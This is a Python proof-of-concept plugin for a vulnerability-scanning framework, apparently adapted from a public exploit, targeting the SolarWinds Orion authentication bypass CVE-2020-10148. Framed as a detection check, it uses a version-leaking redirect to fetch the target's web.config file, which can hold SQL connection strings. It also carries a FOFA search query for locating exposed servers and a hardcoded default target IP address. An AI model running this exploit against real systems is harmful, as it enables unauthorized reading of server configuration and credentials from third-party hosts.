# coding:utf-8
from urllib.parse import urlsplit

import requests
# Silence urllib3's per-request warning: the checks below deliberately send verify=False.
requests.packages.urllib3.disable_warnings()

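class c2Class(object):
	"""Detection check for the SolarWinds Orion issue tracked as CVE-2020-10148.

	The metadata attributes set in ``__init__`` (vulname, vulsystem, fofa, ...)
	are read by the surrounding scanning framework.  ``c2Func`` runs the check
	against one target and returns ``(status, returnData)``: status 1 when the
	version-leaking redirect is observed and ``web.config`` is then served with
	the expected marker, otherwise 0.  Errors are reported in ``returnData``
	rather than raised.
	"""

	def __init__(self):
		self.vulname = 'SolarWinds Orion API RCE (CVE-2020-10148)'
		self.vulsystem = 'SolarWinds'
		self.vulsystemintro = 'SolarWinds是网络安全管理软件产品。'
		self.vulversion = 'Orion Version < 2020.2.1HF2 2019.4HF6'
		self.fofa = 'title="SolarWinds Orion"'
		self.findtime = '2020-12'
		self.refer = 'https://blog.csdn.net/smellycat000/article/details/112057631\nhttps://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965/stargazers\nhttps://nosec.org/home/detail/4630.html'
		self.bbb = '这个洞来源于FireEye的红队工具泄露，说是SolarWinds的Orion API可以绕过登录，进而导致rce，不过现在只有读文件的poc。20200114'
		self.testisok = True

		# Request paths used by c2Func (vulpath_db is kept for the framework; c2Func does not use it).
		self.vulpath = '/Orion/invalid.aspx.js'
		self.vulpath_webconfig = '/web.config'
		self.vulpath_db = '/SWNetPerfMon.db'
		# Expected status of the web.config response and the marker that confirms
		# its content (flag3 is kept for the framework; c2Func does not use it).
		self.flag = 200
		self.flag2 = 'SolarWinds.Orion.Core.Common.Configuration.WebCompressionSection, SolarWinds.Orion.Core.Common'
		self.flag3 = 'Encrypted Connection String for SQL Server added by Orion Core Services'
		# Per-request timeout (seconds) so an unresponsive host cannot stall the scan.
		self.timeout = 10

	@staticmethod
	def _normalize_target(target):
		"""Reduce *target* to its ``scheme://host[:port]`` base URL.

		A scheme-less target is assumed to be http.  Any path component (for
		example a pasted ``/Orion/Login.aspx`` URL) is dropped so the check
		paths can be appended cleanly.

		Raises:
			ValueError: if no host can be found in *target*.
		"""
		if not target.startswith(('http://', 'https://')):
			target = 'http://' + target
		parts = urlsplit(target)
		if not parts.netloc:
			raise ValueError('no host in target: %r' % (target,))
		return '%s://%s' % (parts.scheme, parts.netloc)

	@staticmethod
	def _version_suffix(location):
		"""Return the ``.i18n.ashx?...`` tail of a redirect Location value.

		The tail is returned only when it carries a ``v=`` parameter (the
		leaked version string); otherwise ``''``.  A missing marker is not an
		error, it simply means the host did not exhibit the redirect.
		"""
		start = location.find('.i18n.ashx')
		if start < 0:
			return ''
		tail = location[start:]
		return tail if 'v=' in tail else ''

	def _leaked_version(self, resp):
		"""Return the version-carrying Location tail from *resp* or any hop it followed.

		requests follows redirects by default, so the 3xx that carries the
		Location header of interest may sit in ``resp.history`` rather than on
		the final response; every hop is inspected in order.
		"""
		for hop in list(resp.history) + [resp]:
			suffix = self._version_suffix(hop.headers.get('location', ''))
			if suffix:
				return suffix
		return ''

	def c2Func(self, target):
		"""Run the check against *target*.

		Args:
			target: host, host:port or URL; normalised by ``_normalize_target``.

		Returns:
			``(status, returnData)`` with status 1 and a descriptive message when
			both conditions are met, status 0 and ``''`` when the host does not
			respond as expected, or status 0 and the error text if a request
			or normalisation fails.
		"""
		status = 0
		returnData = ''
		try:
			base = self._normalize_target(target).strip('/')
			resp = requests.get(url=base + self.vulpath, verify=False, timeout=self.timeout)
			leakedVersion = self._leaked_version(resp)
			if leakedVersion:
				urlGetWebConfig = base + self.vulpath_webconfig + leakedVersion
				leakedConfig = requests.get(url=urlGetWebConfig, verify=False, timeout=self.timeout)
				# Both the status and the configuration-section marker must match
				# before the host is reported, to avoid counting generic 200 pages.
				if leakedConfig.status_code == self.flag and self.flag2 in leakedConfig.text:
					returnData = '%s could be vulnerable.The vuln is %s.'\
					'The payload is [%s], u can get web.config by the payload.' % (base, self.vulname, urlGetWebConfig)
					status = 1
		except Exception as e:
			# Tool boundary: the framework expects the error text, not an exception.
			returnData = str(e)
		return status, returnData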

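if __name__ == '__main__':
	import sys
	# Accept the target as the first command-line argument; the literal below is
	# the original author's default and is kept only so the script runs unchanged.
	target = sys.argv[1] if len(sys.argv) > 1 else 'http://73.178.202.24:8080/'
	pocObj = c2Class()
	print(pocObj.c2Func(target))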